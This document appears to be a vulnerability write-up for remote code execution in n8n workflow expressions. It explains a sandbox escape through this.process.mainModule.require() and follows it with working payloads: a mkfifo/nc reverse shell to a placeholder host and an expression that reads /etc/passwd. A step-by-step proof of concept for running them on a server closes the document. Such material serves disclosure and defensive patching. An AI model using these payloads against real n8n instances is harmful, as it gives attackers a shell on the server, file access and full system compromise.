n8n Remote Code Execution via Expression Injection
A critical Remote Code Execution vulnerability exists in n8n's expression evaluation system that allows authenticated users to execute arbitrary system commands through crafted expressions in workflow parameters, resulting in complete system compromise.
Technical Analysis
Root Cause
The vulnerability stems from inadequate sandboxing in the expression evaluation system. While n8n implements AST-based protections through the tournament library, these protections can be bypassed by reaching Node.js built-in modules through the this.process.mainModule.require() pattern: inside a non-strict function called without a receiver, this resolves to the global object, which in Node.js exposes process, and process.mainModule.require() can load any built-in module. That path circumvents the mechanisms that block direct require() calls.
Affected Components
Primary: packages/workflow/src/expression.ts - Expression evaluation logic
Secondary: packages/tournament/src/FunctionEvaluator.ts - Core evaluation engine
Tertiary: packages/tournament/src/ExpressionBuilder.ts - AST transformation
Exploitation Details
Primary Attack Vector:
Authenticated users can inject expressions in workflow node parameters that start with ={{ and end with }}. When workflows are executed, expressions are evaluated in a context that provides access to Node.js built-in modules.
Confirmed Exploitation Method
For Reverse Shell:
{{ (function() { try { const cp = this.process.mainModule.require('child_process'); cp.execSync('mkfifo /tmp/f; nc xxxx 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f'); return 'nc_pipe_reverse_shell_attempted'; } catch(e) { return 'error: '+e.message; } })() }}
For Reading File:
{{ (function() { try { const fs = this.process.mainModule.require('fs'); return fs.readFileSync('/etc/passwd', 'utf8'); } catch(e) { return 'error: '+e.message; } })() }}
Proof of Concept
Step 1: Authentication
Log into n8n instance with valid credentials
Navigate to workflow creation interface
Step 2: Workflow Creation
Create a new workflow
Add a "Set" node or similar node accepting expressions
In a parameter field, insert the malicious expression
Step 3: Execution
Execute the workflow manually
Command execution occurs in the n8n server context
Remote shell connection established (if using reverse shell payload)
Step 4: Verification
Commands execute with the privileges of the n8n process
Full access to the underlying system
Ability to read/write files, execute commands, establish connections